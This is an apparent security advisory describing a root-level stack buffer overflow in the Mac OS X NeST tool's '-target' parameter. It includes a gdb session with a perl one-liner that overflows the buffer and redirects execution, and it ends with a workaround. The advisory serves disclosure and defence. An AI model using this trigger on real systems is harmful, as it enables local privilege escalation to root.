Mac OS X is an advanced operating system that blends features of UNIX with the ease-of-use of the Macintosh. NetInfo is "Darwin's built-in directory system. It stores administrative information in a hierarchical database of nodes called directories. NeST is the NetInfo Setup Tool".
A buffer overflow vulnerability in Mac OS X NeST will result in execution of arbitrary code with root privileges. The vulnerability itself is a stack overflow and is trivially exploitable.
Vulnerable Systems:
* Mac OS X Server version 10.3.7
NeST is the NetInfo Setup Tool for Mac OS X. The vulnerability specifically exists due to insufficient bounds checking on the argument passed to the '-target' command line parameter. Local attackers can supply an overly long value to overflow the buffer and execute arbitrary code.
Debugging Snips:
The following example debugger session shows execution control when overflowing the target buffer osx-dev:~ $ gdb -q /usr/sbin/NeST
(gdb) run -target `perl -e 'print "\xbf\xff\xfe\xe4" x 800 '`
Starting program: /usr/sbin/NeST -target `perl -e 'print
"\xbf\xff\xfe\xe4" x 800 '`
Reading symbols for shared libraries ............... done
Password:
1976-04-01 08:29:04.480 NeST[3359] CFLog (0):
CFPropertyListCreateFromXMLData(): plist parse failed; the
data is not proper UTF-8. The file name for this data
could be:
Info.plist -- file://localhost/usr/sbin/
The parser will retry as in 10.2, but the problem should be
corrected in the plist.
Program received signal EXC_BAD_INSTRUCTION, Illegal
instruction/operand.
0xbffffee8 in ?? ()
(gdb) bt
#0 0xbffffee8 in ?? ()
#1 0xbffffee4 in ?? ()
Workaround:
Remove the setuid bit from the NeST binary until the vendor releases a patch.
